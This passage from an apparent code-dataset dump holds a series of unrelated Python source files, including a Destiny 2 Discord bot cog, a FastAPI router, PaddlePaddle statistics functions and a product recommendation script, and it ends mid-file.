@commands.bot_has_permissions(embed_links=True, add_reactions=True)\n async def stats(self, ctx: commands.Context, stat_type: StatsPage, all: bool = True) -> None:\n \"\"\"\n Display each character's stats for a specific activity\n `` The type of stats to display, available options are:\n `raid`, `pvp`, `pve`, patrol, story, gambit, and strikes\n \"\"\"\n async with ctx.typing():\n if not await self.has_oauth(ctx):\n msg = _(\n \"You need to authenticate your Bungie.net account before this command will work.\"\n )\n return await ctx.send(msg)\n user = ctx.author\n try:\n chars = await self.get_characters(user)\n except Destiny2APIError:\n # log.debug(e)\n msg = _(\"I can't seem to find your Destiny profile.\")\n await ctx.send(msg)\n return\n # base stats should be available for all stat types\n embeds = await self.build_character_stats(user, chars, stat_type)\n\n if not embeds:\n return await ctx.send(\n _(\"No stats could be found for that activity and character.\")\n )\n await BaseMenu(\n source=BasePages(\n pages=embeds,\n ),\n delete_message_after=False,\n clear_reactions_after=True,\n timeout=60,\n cog=self,\n page_start=0,\n ).start(ctx=ctx)\n\n @destiny.command()\n @checks.is_owner()\n 
@commands.bot_has_permissions(add_reactions=True)\n async def manifest(self, ctx: commands.Context, d1: bool = False) -> None:\n \"\"\"\n See the current manifest version and optionally re-download it\n \"\"\"\n if not d1:\n try:\n headers = await self.build_headers()\n except Exception:\n return await ctx.send(\n _(\n \"You need to set your API authentication tokens with `[p]destiny token` first.\"\n )\n )\n manifest_data = await self.request_url(\n f\"{BASE_URL}/Destiny2/Manifest/\", headers=headers\n )\n version = await self.config.manifest_version()\n if not version:\n version = _(\"Not Downloaded\")\n msg = _(\"Current manifest version is {version}.\").format(version=version)\n redownload = _(\"re-download\")\n if manifest_data[\"version\"] != version:\n msg += _(\"\\n\\nThere is an update available to version {version}\").format(\n version=manifest_data[\"version\"]\n )\n redownload = _(\"download\")\n await ctx.send(msg)\n await ctx.trigger_typing()\n msg = await ctx.send(\n _(\"Would you like to {redownload} the manifest?\").format(redownload=redownload)\n )\n start_adding_reactions(msg, ReactionPredicate.YES_OR_NO_EMOJIS)\n pred = ReactionPredicate.yes_or_no(msg, ctx.author)\n try:\n react, user = await self.bot.wait_for(\"reaction_add\", check=pred, timeout=15)\n except asyncio.TimeoutError:\n await msg.delete()\n if pred.result:\n try:\n version = await self.get_manifest()\n except Exception:\n log.exception(\"Error getting destiny manifest\")\n return await ctx.send(_(\"There was an issue downloading the manifest.\"))\n await msg.delete()\n await ctx.send(f\"Manifest {version} was downloaded.\")\n else:\n await msg.delete()\n else:\n try:\n version = await self.get_manifest(d1)\n except Exception:\n log.exception(\"Error getting D1 manifest\")\n return await ctx.send(_(\"There was an issue downloading the manifest.\"))\n\n @destiny.command()\n @checks.is_owner()\n async def token(\n self, ctx: commands.Context, api_key: str, client_id: str, client_secret: str\n ) -> None:\n \"\"\"\n Set the API tokens for Destiny 2's API\n\n Required information is found at:\n https://www.bungie.net/en/Application\n select **Create New App**\n Choose **Confidential** OAuth Client type\n Select the scope you would like the bot to have access to\n Set the redirect URL to https://localhost/\n NOTE: It is strongly recommended to use this command in DM\n \"\"\"\n await self.config.api_token.api_key.set(api_key)\n await self.config.api_token.client_id.set(client_id)\n await self.config.api_token.client_secret.set(client_secret)\n if ctx.channel.permissions_for(ctx.me).manage_messages:\n await ctx.message.delete()\n await ctx.send(\"Destiny 2 API credentials set!\")\n"} {"ext": "py", "sha": "1a2f0ebacc99295885853ad29a470b3803afd2c8", "content": "#!/usr/bin/env python3\n# @generated AUTOGENERATED file. Do not Change!\n\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom gql.gql.datetime_utils import DATETIME_FIELD\nfrom gql.gql.graphql_client import GraphqlClient\nfrom functools import partial\nfrom numbers import Number\nfrom typing import Any, Callable, List, Mapping, Optional\n\nfrom dataclasses_json import DataClassJsonMixin\n\nfrom .equipment_port_type_fragment import EquipmentPortTypeFragment, QUERY as EquipmentPortTypeFragmentQuery\nfrom .edit_equipment_port_type_input import EditEquipmentPortTypeInput\n\n\nQUERY: List[str] = EquipmentPortTypeFragmentQuery + [\"\"\"\nmutation EditEquipmentPortTypeMutation($input: EditEquipmentPortTypeInput!) 
{\n editEquipmentPortType(input: $input) {\n ...EquipmentPortTypeFragment\n }\n}\n\n\"\"\"]\n\n@dataclass\nclass EditEquipmentPortTypeMutation(DataClassJsonMixin):\n @dataclass\n class EditEquipmentPortTypeMutationData(DataClassJsonMixin):\n @dataclass\n class EquipmentPortType(EquipmentPortTypeFragment):\n pass\n\n editEquipmentPortType: EquipmentPortType\n\n data: EditEquipmentPortTypeMutationData\n\n @classmethod\n # fmt: off\n def execute(cls, client: GraphqlClient, input: EditEquipmentPortTypeInput) -> EditEquipmentPortTypeMutationData:\n # fmt: off\n variables = {\"input\": input}\n response_text = client.call(''.join(set(QUERY)), variables=variables)\n return cls.from_json(response_text).data\n"} {"ext": "py", "sha": "1a2f0f61afd76a87fe73e5a154f969f50391dd65", "content": "from api.api_error import APIError\nfrom api.api_message import APIMessage\nfrom api.json_connector import JSONConnector\nfrom api.api_config import APIConfig\nfrom api.ptp_connector import PTPConnector\n\n\nclass BotMethods:\n\n @staticmethod\n def start_bot(req):\n \"\"\"\n Starts a PTP Bot object.\n :param req:\n :return:\n \"\"\"\n keys = req.keys()\n\n if 'bot_name' not in keys or not req['bot_name']:\n return APIError.create(message='No bot name in the request body.', code=400)\n elif 'action_name' not in keys or not req['action_name']:\n return APIError.create(message='No action name in the request body.', code=400)\n\n bots = JSONConnector.get_json_file_content(\n directory=APIConfig.json_save_path,\n name=APIConfig.json_bots_file_name\n )\n\n bot_actions = JSONConnector.get_json_file_content(\n directory=APIConfig.json_save_path,\n name=APIConfig.json_bot_actions_file_name\n )\n\n found_action = {}\n found_bot = {}\n\n for item in bot_actions['bot_actions']:\n print(req, item)\n if req['bot_name'] == item['bot_name'] and req['action_name'] == item['action_name']:\n found_action = item\n\n for item in bots['bots']:\n if req['bot_name'] == item['bot_name']:\n found_bot = item\n\n if found_action and found_bot:\n access_info = {\n 'access_token': found_bot['access_token'],\n 'access_token_secret': found_bot['access_token_secret'],\n 'consumer_key': found_bot['consumer_key'],\n 'consumer_secret': found_bot['consumer_secret']\n }\n\n PTPConnector.start_bot(access_info, found_action['method'], {'actions': found_action['actions']})\n\n return APIMessage.create(message='Bot successfully started.', code=200)\n"} {"ext": "py", "sha": "1a2f1067e877603262ee3997806d4aac8f9c8561", "content": "from fastapi import APIRouter, BackgroundTasks, Depends, File, UploadFile\nfrom typing import List\n\nfrom sqlalchemy.orm import Session\n\nfrom api.utils.auth import get_db\nfrom api.auth.auth import auth_check\n\nfrom api.db.crud import templates as crud\nfrom api.db.crud import settings as scrud\nfrom api.db.schemas import templates as schemas\nfrom api.db.models import containers\nfrom api.db.database import engine\n\nfrom api.actions import resources\nfrom api.actions.apps import _update_self, check_self_update\n\nfrom api.settings import Settings\n\nfrom fastapi_jwt_auth import AuthJWT\n\n\ncontainers.Base.metadata.create_all(bind=engine)\n\nsettings = Settings()\n\nrouter = APIRouter()\n\n\n@router.get(\n \"/variables\",\n response_model=List[schemas.TemplateVariables],\n operation_id=\"authorize\",\n)\ndef read_template_variables(\n db: Session = Depends(get_db), Authorize: AuthJWT = Depends()\n):\n auth_check(Authorize)\n return crud.read_template_variables(db=db)\n\n\n@router.post(\n \"/variables\",\n 
response_model=List[schemas.TemplateVariables],\n)\ndef set_template_variables(\n new_variables: List[schemas.TemplateVariables],\n db: Session = Depends(get_db),\n Authorize: AuthJWT = Depends(),\n):\n auth_check(Authorize)\n return crud.set_template_variables(new_variables=new_variables, db=db)\n\n\n@router.get(\n \"/export\",\n response_model=schemas.Import_Export,\n)\ndef export_settings(db: Session = Depends(get_db), Authorize: AuthJWT = Depends()):\n auth_check(Authorize)\n return scrud.export_settings(db=db)\n\n\n@router.post(\n \"/export\",\n)\ndef import_settings(\n db: Session = Depends(get_db),\n upload: UploadFile = File(...),\n Authorize: AuthJWT = Depends(),\n):\n auth_check(Authorize)\n return scrud.import_settings(db=db, upload=upload)\n\n\n@router.get(\n \"/prune/{resource}\",\n)\ndef prune_resources(resource: str, Authorize: AuthJWT = Depends()):\n auth_check(Authorize)\n return resources.prune_resources(resource)\n\n\n@router.get(\n \"/update\",\n)\ndef update_self(background_tasks: BackgroundTasks, Authorize: AuthJWT = Depends()):\n auth_check(Authorize)\n return _update_self(background_tasks)\n\n\n@router.get(\n \"/check/update\",\n)\ndef _check_self_update(Authorize: AuthJWT = Depends()):\n auth_check(Authorize)\n return check_self_update()\n"} {"ext": "py", "sha": "1a2f108938ac1fd13e7ad508326814a45b6c54b5", "content": "#! /usr/bin/env python\n# -*- coding: UTF-8 -*-\n\nfrom base.basic_config_if import BasicConfig\nfrom commons.configurator import Configurator\nfrom cpp.incl_deps.include_deps_if import FileIncludeDepsSupply\nfrom cpp.incl_deps.include_rule_checker_if import IncludeRulesFactory\nfrom cpp.incl_deps.include_rule_checker_util import (IncludeRuleCheckerProcessor, \n IncludeRuleCheckerOutputter)\nimport csv\nimport logging\nimport sys\n\nconfig_basic = BasicConfig()\nconfig_checker = IncludeRulesFactory()\nconfig_file_include_deps_supply = FileIncludeDepsSupply()\n\ndef main():\n logging.basicConfig(stream=sys.stderr,level=logging.DEBUG)\n Configurator().default()\n \n if len(sys.argv) > 1:\n file_links = csv.reader(open(sys.argv[1]), delimiter=',')\n else: \n file_links = config_file_include_deps_supply.get_file_include_deps()\n \n illegal_links, total_count, rule_violations = IncludeRuleCheckerProcessor().check_links(file_links, config_checker.get_include_rules())\n IncludeRuleCheckerOutputter().output(sys.stdout, illegal_links, total_count, rule_violations)\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a2f1094bfd1df43995d93f1d87fef39c68f3a48", "content": "\"\"\"\nThis is how to enable `language()` for one Autocomplete::\n\n import autocomplete_light.shortcuts as al\n from al.contrib.hvad import AutocompleteModelBase\n\n al.register(YourModel, AutocompleteModelBase)\n\nOr, enable it globally by updating your `autodiscover()` call like this::\n\n import autocomplete_light.shortcuts as al\n from al.contrib.hvad import AutocompleteModelBase\n al.registry.autocomplete_model_base = AutocompleteModelBase\n al.autodiscover()\n\nIn that case, you can just register as usual::\n\n al.register(YourTranslatableModel)\n\"\"\"\n\nimport autocomplete_light.shortcuts as al\n\n\nclass AutocompleteModel(al.AutocompleteModel):\n \"\"\" Ensure that `.language()` is called. \"\"\"\n def __init__(self, request=None, values=None):\n \"\"\"\n Overridden init to call .language(). 
Note: this will replace the\n base `choices`.\n \"\"\"\n if getattr(self.choices.model.objects, 'language', False):\n self.choices = self.choices.model.objects.language()\n super(AutocompleteModel, self).__init__(request, values)\n\n\nclass AutocompleteModelBase(AutocompleteModel, al.AutocompleteBase):\n \"\"\" Drop-in replacement for AutocompleteModelBase \"\"\"\n pass\n\n\nclass AutocompleteModelTemplate(AutocompleteModel, al.AutocompleteTemplate):\n \"\"\" Drop-in replacement for AutocompleteModelTemplate \"\"\"\n pass\n"} {"ext": "py", "sha": "1a2f10ba8d33361465de1e4248a22b9c1099a771", "content": "# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# TODO: define statistical functions of a tensor \n\nimport numpy as np\nfrom ..fluid.framework import Variable\nfrom ..fluid.layer_helper import LayerHelper\nfrom ..fluid.framework import core, in_dygraph_mode\nfrom ..fluid import layers\nfrom .search import where\nfrom ..fluid.data_feeder import convert_dtype, check_variable_and_dtype, check_type, check_dtype\nimport paddle\nfrom paddle import _C_ops\n\n__all__ = []\n\n\ndef mean(x, axis=None, keepdim=False, name=None):\n \"\"\"\n Computes the mean of the input tensor's elements along ``axis``.\n\n Args:\n x (Tensor): The input Tensor with data type float32, float64.\n axis (int|list|tuple, optional): The axis along which to perform mean\n calculations. ``axis`` should be int, list(int) or tuple(int). If\n ``axis`` is a list/tuple of dimension(s), mean is calculated along\n all element(s) of ``axis`` . ``axis`` or element(s) of ``axis``\n should be in range [-D, D), where D is the dimensions of ``x`` . If\n ``axis`` or element(s) of ``axis`` is less than 0, it works the\n same way as :math:`axis + D` . If ``axis`` is None, mean is\n calculated over all elements of ``x``. Default is None.\n keepdim (bool, optional): Whether to reserve the reduced dimension(s)\n in the output Tensor. If ``keepdim`` is True, the dimensions of\n the output Tensor is the same as ``x`` except in the reduced\n dimensions(it is of size 1 in this case). Otherwise, the shape of\n the output Tensor is squeezed in ``axis`` . Default is False.\n name (str, optional): Name for the operation (optional, default is None).\n For more information, please refer to :ref:`api_guide_Name`.\n\n Returns:\n Tensor, results of average along ``axis`` of ``x``, with the same data\n type as ``x``.\n\n Examples:\n .. 
code-block:: python\n\n import paddle\n\n x = paddle.to_tensor([[[1., 2., 3., 4.],\n [5., 6., 7., 8.],\n [9., 10., 11., 12.]],\n [[13., 14., 15., 16.],\n [17., 18., 19., 20.],\n [21., 22., 23., 24.]]])\n out1 = paddle.mean(x)\n # [12.5]\n out2 = paddle.mean(x, axis=-1)\n # [[ 2.5 6.5 10.5]\n # [14.5 18.5 22.5]]\n out3 = paddle.mean(x, axis=-1, keepdim=True)\n # [[[ 2.5]\n # [ 6.5]\n # [10.5]]\n # [[14.5]\n # [18.5]\n # [22.5]]]\n out4 = paddle.mean(x, axis=[0, 2])\n # [ 8.5 12.5 16.5]\n \"\"\"\n\n if isinstance(axis, int):\n axis = [axis]\n reduce_all = True if axis is None \\\n or len(axis)==0 \\\n or len(axis) == len(x.shape) else False\n if axis is None or len(axis) == 0:\n axis = [0]\n\n if in_dygraph_mode():\n return _C_ops.reduce_mean(x, 'dim', axis, 'keep_dim', keepdim,\n 'reduce_all', reduce_all)\n\n check_variable_and_dtype(x, 'x/input', ['float32', 'float64'],\n 'mean/reduce_mean')\n check_type(axis, 'axis/dim', (int, list, tuple), 'mean/reduce_mean')\n if isinstance(axis, (list, tuple)):\n for item in axis:\n check_type(item, 'elements of axis/dim', (int), 'mean/reduce_mean')\n\n helper = LayerHelper('mean', **locals())\n attrs = {'dim': axis, 'keep_dim': keepdim, 'reduce_all': reduce_all}\n out = helper.create_variable_for_type_inference(x.dtype)\n helper.append_op(\n type='reduce_mean', inputs={'X': x}, outputs={'Out': out}, attrs=attrs)\n return out\n\n\ndef var(x, axis=None, unbiased=True, keepdim=False, name=None):\n \"\"\"\n Computes the variance of ``x`` along ``axis`` .\n\n Args:\n x (Tensor): The input Tensor with data type float32, float64.\n axis (int|list|tuple, optional): The axis along which to perform\n variance calculations. ``axis`` should be int, list(int) or\n tuple(int). If ``axis`` is a list/tuple of dimension(s), variance\n is calculated along all element(s) of ``axis`` . ``axis`` or\n element(s) of ``axis`` should be in range [-D, D), where D is the\n dimensions of ``x`` . If ``axis`` or element(s) of ``axis`` is less\n than 0, it works the same way as :math:`axis + D` . If ``axis`` is\n None, variance is calculated over all elements of ``x``. Default\n is None.\n unbiased (bool, optional): Whether to use the unbiased estimation. If\n ``unbiased`` is True, the divisor used in the computation is\n :math:`N - 1`, where :math:`N` represents the number of elements\n along ``axis`` , otherwise the divisor is :math:`N`. Default is True.\n keepdim (bool, optional): Whether to reserve the reduced dimension(s)\n in the output Tensor. If ``keepdim`` is True, the dimensions of\n the output Tensor is the same as ``x`` except in the reduced\n dimensions(it is of size 1 in this case). Otherwise, the shape of\n the output Tensor is squeezed in ``axis`` . Default is False.\n name (str, optional): Name for the operation (optional, default is None).\n For more information, please refer to :ref:`api_guide_Name`.\n\n Returns:\n Tensor, results of variance along ``axis`` of ``x``, with the same data\n type as ``x``.\n\n Examples:\n .. code-block:: python\n\n import paddle\n\n x = paddle.to_tensor([[1.0, 2.0, 3.0], [1.0, 4.0, 5.0]])\n out1 = paddle.var(x)\n # [2.66666667]\n out2 = paddle.var(x, axis=1)\n # [1. 
4.33333333]\n \"\"\"\n if not in_dygraph_mode():\n check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'var')\n\n u = mean(x, axis, True, name)\n out = paddle.sum((x - u)**2, axis, keepdim=keepdim, name=name)\n\n n = paddle.cast(paddle.numel(x), x.dtype) \\\n / paddle.cast(paddle.numel(out), x.dtype)\n if unbiased:\n one_const = paddle.ones([1], x.dtype)\n n = where(n > one_const, n - 1., one_const)\n out /= n\n return out\n\n\ndef std(x, axis=None, unbiased=True, keepdim=False, name=None):\n \"\"\"\n Computes the standard-deviation of ``x`` along ``axis`` .\n\n Args:\n x (Tensor): The input Tensor with data type float32, float64.\n axis (int|list|tuple, optional): The axis along which to perform\n standard-deviation calculations. ``axis`` should be int, list(int)\n or tuple(int). If ``axis`` is a list/tuple of dimension(s),\n standard-deviation is calculated along all element(s) of ``axis`` .\n ``axis`` or element(s) of ``axis`` should be in range [-D, D),\n where D is the dimensions of ``x`` . If ``axis`` or element(s) of\n ``axis`` is less than 0, it works the same way as :math:`axis + D` .\n If ``axis`` is None, standard-deviation is calculated over all\n elements of ``x``. Default is None.\n unbiased (bool, optional): Whether to use the unbiased estimation. If\n ``unbiased`` is True, the standard-deviation is calculated via the\n unbiased estimator. If ``unbiased`` is True, the divisor used in\n the computation is :math:`N - 1`, where :math:`N` represents the\n number of elements along ``axis`` , otherwise the divisor is\n :math:`N`. Default is True.\n keepdim (bool, optional): Whether to reserve the reduced dimension(s)\n in the output Tensor. If ``keepdim`` is True, the dimensions of\n the output Tensor is the same as ``x`` except in the reduced\n dimensions(it is of size 1 in this case). Otherwise, the shape of\n the output Tensor is squeezed in ``axis`` . Default is False.\n name (str, optional): Name for the operation (optional, default is None).\n For more information, please refer to :ref:`api_guide_Name`.\n\n Returns:\n Tensor, results of standard-deviation along ``axis`` of ``x``, with the\n same data type as ``x``.\n\n Examples:\n .. code-block:: python\n\n import paddle\n\n x = paddle.to_tensor([[1.0, 2.0, 3.0], [1.0, 4.0, 5.0]])\n out1 = paddle.std(x)\n # [1.63299316]\n out2 = paddle.std(x, axis=1)\n # [1. 2.081666]\n \"\"\"\n if not in_dygraph_mode():\n check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'std')\n\n out = var(**locals())\n return paddle.sqrt(out)\n\n\ndef numel(x, name=None):\n \"\"\"\n Returns the number of elements for a tensor, which is a int64 Tensor with shape [1] in static mode\n or a scalar value in imperative mode\n\n Args:\n x (Tensor): The input Tensor, it's data type can be bool, float16, float32, float64, int32, int64.\n\n Returns:\n Tensor: The number of elements for the input Tensor.\n\n Examples:\n .. 
code-block:: python\n\n import paddle\n \n x = paddle.full(shape=[4, 5, 7], fill_value=0, dtype='int32')\n numel = paddle.numel(x) # 140\n\n\n \"\"\"\n if in_dygraph_mode():\n return _C_ops.size(x)\n\n if not isinstance(x, Variable):\n raise TypeError(\"x must be a Tensor in numel\")\n helper = LayerHelper('numel', **locals())\n out = helper.create_variable_for_type_inference(\n dtype=core.VarDesc.VarType.INT64)\n helper.append_op(type='size', inputs={'Input': x}, outputs={'Out': out})\n return out\n\n\ndef median(x, axis=None, keepdim=False, name=None):\n \"\"\"\n Compute the median along the specified axis.\n\n Args:\n x (Tensor): The input Tensor, it's data type can be bool, float16, float32, float64, int32, int64.\n axis (int, optional): The axis along which to perform median calculations ``axis`` should be int.\n ``axis`` should be in range [-D, D), where D is the dimensions of ``x`` .\n If ``axis`` is less than 0, it works the same way as :math:`axis + D`.\n If ``axis`` is None, median is calculated over all elements of ``x``. Default is None.\n keepdim (bool, optional): Whether to reserve the reduced dimension(s)\n in the output Tensor. If ``keepdim`` is True, the dimensions of\n the output Tensor is the same as ``x`` except in the reduced\n dimensions(it is of size 1 in this case). Otherwise, the shape of\n the output Tensor is squeezed in ``axis`` . Default is False.\n name (str, optional): Name for the operation (optional, default is None).\n For more information, please refer to :ref:`api_guide_Name`.\n\n Returns:\n Tensor, results of median along ``axis`` of ``x``. If data type of ``x`` is float64, data type of results will be float64, otherwise data type will be float32.\n\n Examples:\n .. code-block:: python\n\n import paddle\n\n x = paddle.arange(12).reshape([3, 4])\n # x is [[0 , 1 , 2 , 3 ],\n # [4 , 5 , 6 , 7 ],\n # [8 , 9 , 10, 11]]\n\n y1 = paddle.median(x)\n # y1 is [5.5]\n\n y2 = paddle.median(x, axis=0)\n # y2 is [4., 5., 6., 7.]\n\n y3 = paddle.median(x, axis=1)\n # y3 is [1.5, 5.5, 9.5]\n\n y4 = paddle.median(x, axis=0, keepdim=True)\n # y4 is [[4., 5., 6., 7.]]\n\n \"\"\"\n if not isinstance(x, Variable):\n raise TypeError(\"In median, the input x should be a Tensor.\")\n is_flatten = axis is None\n dims = len(x.shape)\n if is_flatten:\n x = paddle.flatten(x)\n axis = 0\n else:\n if not isinstance(axis, int) or not (axis < dims and axis >= -dims):\n raise ValueError(\n \"In median, axis should be none or an integer in range [-rank(x), rank(x)).\"\n )\n if axis < 0:\n axis += dims\n sz = x.shape[axis]\n kth = sz >> 1\n tensor_topk, idx = paddle.topk(x, kth + 1, axis=axis, largest=False)\n dtype = 'float64' if x.dtype == core.VarDesc.VarType.FP64 else 'float32'\n if sz & 1 == 0:\n out_tensor = paddle.slice(\n tensor_topk, axes=[axis], starts=[kth - 1],\n ends=[kth]) + paddle.slice(\n tensor_topk, axes=[axis], starts=[kth], ends=[kth + 1])\n out_tensor = paddle.cast(out_tensor, dtype=dtype) / 2\n else:\n out_tensor = paddle.cast(\n paddle.slice(\n tensor_topk, axes=[axis], starts=[kth], ends=[kth + 1]),\n dtype=dtype)\n if not keepdim or is_flatten:\n if not is_flatten:\n newshape = x.shape[:axis] + x.shape[axis + 1:]\n elif not keepdim:\n newshape = [1]\n else:\n newshape = [1] * dims\n else:\n newshape = out_tensor.shape\n out_tensor = out_tensor.reshape(newshape, name=name)\n return out_tensor\n"} {"ext": "py", "sha": "1a2f10fd6a45707e43e946a6846e81991cb09110", "content": "# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See 
documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nfrom scrapy.item import Item, Field\n\n\nclass XiaobaiheItem(Item):\n # define the fields for your item here like:\n # name = scrapy.Field()\n username = Field()\n text = Field()\n url = Field()\n"} {"ext": "py", "sha": "1a2f11bfbdbd20d17ab6370d274d33ac02747150", "content": "import pyaf.Bench.TS_datasets as tsds\nimport pyaf.tests.artificial.process_artificial_dataset as art\n\n\n\n\nart.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = \"MovingMedian\", cycle_length = 12, transform = \"None\", sigma = 0.0, exog_count = 20, ar_order = 0);"} {"ext": "py", "sha": "1a2f11e2e7df60a0c636e06ecccbea6464b55fb8", "content": "\"\"\" Tests for the various cli programs \"\"\"\n\nfrom pyontutils.integration_test_helper import _TestCliBase, Folders\n\n\nclass TestCli(Folders, _TestCliBase):\n commands = (\n ['googapis', '--help'],\n ['graphml-to-ttl', '--help'],\n ['necromancy', '--help'],\n ['ontload', '--help'],\n ['overlaps', '--help'],\n ['qnamefix', '--help'],\n ['scigraph-codegen', '--help'],\n ['scig', '--help'],\n ['ttlfmt', '--help'],\n )\n"} {"ext": "py", "sha": "1a2f11ff27e35d8d4438e0a97443a7435d568591", "content": "#!/usr/bin/python\n\nimport math\nimport matplotlib.pyplot as plt\nfrom graphtheory.structures.edges import Edge\nfrom graphtheory.structures.graphs import Graph\nfrom graphtheory.structures.factory import GraphFactory\nfrom graphtheory.structures.points import Point\nfrom graphtheory.forests.treeplot import TreePlot\nfrom graphtheory.forests.treeplot import TreePlotRadiusAngle\n\nV = 20\ngf = GraphFactory(Graph)\nG = gf.make_tree(V)\n#G.show()\nassert G.e() == V-1\n\nalgorithm = TreePlotRadiusAngle(G)\nalgorithm.run()\n#print ( algorithm.point_dict ) # (radius, angle)\n\nD = dict() # node ---> point on the plane\nfor node in algorithm.point_dict:\n (radius, angle) = algorithm.point_dict[node]\n D[node] = Point(radius * math.cos(angle), radius * math.sin(angle))\n#print ( D )\n\nfor edge in G.iteredges():\n x = [D[edge.source].x, D[edge.target].x]\n y = [D[edge.source].y, D[edge.target].y]\n plt.plot(x, y, 'k-') # black line\n\nx = [D[node].x for node in G.iternodes()]\ny = [D[node].y for node in G.iternodes()]\nplt.plot(x, y, 'bo') # blue circle\n\nplt.title(\"Random tree\")\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.show()\n\n# EOF\n"} {"ext": "py", "sha": "1a2f12775a7a02c804df13765fdebe726aaa3ea6", "content": "import pandas as pd\nimport numpy as np\nimport joblib\nimport Levenshtein\nimport argparse\nimport ast\nfrom scipy import stats\n\nfrom src import nlp_preprocessing\n\ndef preprocess_txt(txt: str):\n \"\"\"Executa preprocessamento textual padrão\"\"\"\n cleaned_txt = nlp_preprocessing.clean_text(txt)\n token_txt = nlp_preprocessing.custom_tokenizer(cleaned_txt)\n return \" \".join(token_txt)\n\ndef get_top_docs(query, cleaned_doc_list, doc_titles, get_titles=True):\n \"\"\"Gera as recomedações a partir de uma query e listas de referência\"\"\"\n cleaned_query = preprocess_txt(query)\n dists = [Levenshtein.distance(cleaned_query, doc)\n for doc in cleaned_doc_list]\n\n mask = np.array(dists).argsort()[:10]\n if get_titles:\n return doc_titles.iloc[mask].tolist()\n else:\n return doc_titles.iloc[mask].index.tolist()\n\ndef load_data():\n \"\"\"Carrega os dados\"\"\"\n df = pd.concat([\n pd.read_pickle(\"data/train_query.pickle\"),\n pd.read_pickle(\"data/test_query.pickle\")\n ])\n return df\n\n\ndef series_mode(serie: pd.Series):\n \"\"\"Calcula a moda de uma série\"\"\"\n return 
stats.mode(serie)[0][0]\n\ndef remove_duplicates(df, group=\"product_id\",\n num_cols=[\"price\", \"weight\", \"minimum_quantity\"],\n cat_cols=[\"title\", \"concatenated_tags\"]) -> pd.DataFrame:\n \"\"\"Função que remove os registros duplicados juntando os por média e moda\n a depender dos tipos de coluna\"\"\"\n mode_stats = {col: series_mode for col in cat_cols}\n mean_stats = {col: \"mean\" for col in num_cols}\n agg_stats = dict(**mode_stats, **mean_stats)\n return df.groupby(group).agg(agg_stats)\n\ndef make_predictions(query, clf_model):\n \"\"\"Função que realiza as recomendações com predição de categoria\n majoritária\"\"\"\n df = load_data()\n prod_titles = (df[[\"product_id\", \"title\"]].\n drop_duplicates().set_index(\"product_id\")[\"title\"])\n cleaned_prod_titles = [preprocess_txt(txt) for txt in prod_titles]\n prod_id_select = get_top_docs(query,\n cleaned_prod_titles,\n prod_titles,\n False)\n selected_df = df.loc[df[\"product_id\"].isin(prod_id_select)]\n selected_df = remove_duplicates(selected_df)\n predicted_cats = clf_model.predict(selected_df)\n major_cat = stats.mode(predicted_cats)[0][0]\n print(major_cat)\n for _id, title in selected_df[\"title\"].iteritems():\n print(f\"{_id} - {title}\")\n \n \n\n# função auxiliar do modelo de classificação\ndef select_txt(X: pd.DataFrame, col: str):\n return X[col]\n \n# função auxiliar do modelo de classificação\ndef select_base_features(X: pd.DataFrame):\n return X[[\"price\", \"weight\", \"minimum_quantity\"]]\n\n\n\ndef load_args() -> pd.DataFrame:\n \"\"\"Função de carregamento de configurações.\n\n Returns:\n pd.DataFrame: resultado a ser categorizado.\n \"\"\"\n # criando os atributos que vão ser recebidos e parseando-os\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\",\n \"--category\",\n help=\"Texto de registro a ser categorizado\",\n type=str)\n parser.add_argument(\"-r\",\n \"--recommendation\",\n help=\"Sistema de recomendação de produtos\",\n type=str)\n args = parser.parse_args()\n \n # extraindo dos atributos recebidos o registro a ser categorizado\n # e adequando-o para a predição\n if args.category is not None:\n product_dict = ast.literal_eval(args.category)\n product_df = pd.Series(product_dict).to_frame().T\n else:\n product_df = None\n \n return product_df, args.recommendation\n\ndef predict_single_category(df, clf_model):\n product_category = clf_model.predict(df)[0]\n print(product_category)\n\ndef main():\n # carregando o modelo\n rf_clf_pipeline = joblib.load(\"assets/category_rf_clf_pipeline.joblib\")\n # carregando o registro a ser categorizado\n product_df, query = load_args()\n # fazendo a previsão da categoria\n if product_df is not None:\n predict_single_category(product_df, rf_clf_pipeline)\n if query is not None:\n make_predictions(query, rf_clf_pipeline)\n \n\nif __name__ == \"__main__\":\n main()"} {"ext": "py", "sha": "1a2f129fc6e9152c4f93a72acd1cfc2e585a8c32", "content": "import re\nimport os\nimport struct\nimport argparse\nimport collections\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom tensorflow.core.example import example_pb2\nfrom utils import is_num\n\n\nparser = argparse.ArgumentParser()\n\n# Path\nparser.add_argument('--dataset', type=str, choices=['restaurant', 'beer'], default='restaurant')\nparser.add_argument('--vocab_fname', type=str, default='./data/vocab.txt')\n\nargs = parser.parse_args()\n\n\"\"\"\nPreprocessing script file\n\"\"\"\n\n\ndef tokenize_sent(sent, lemtzr, 
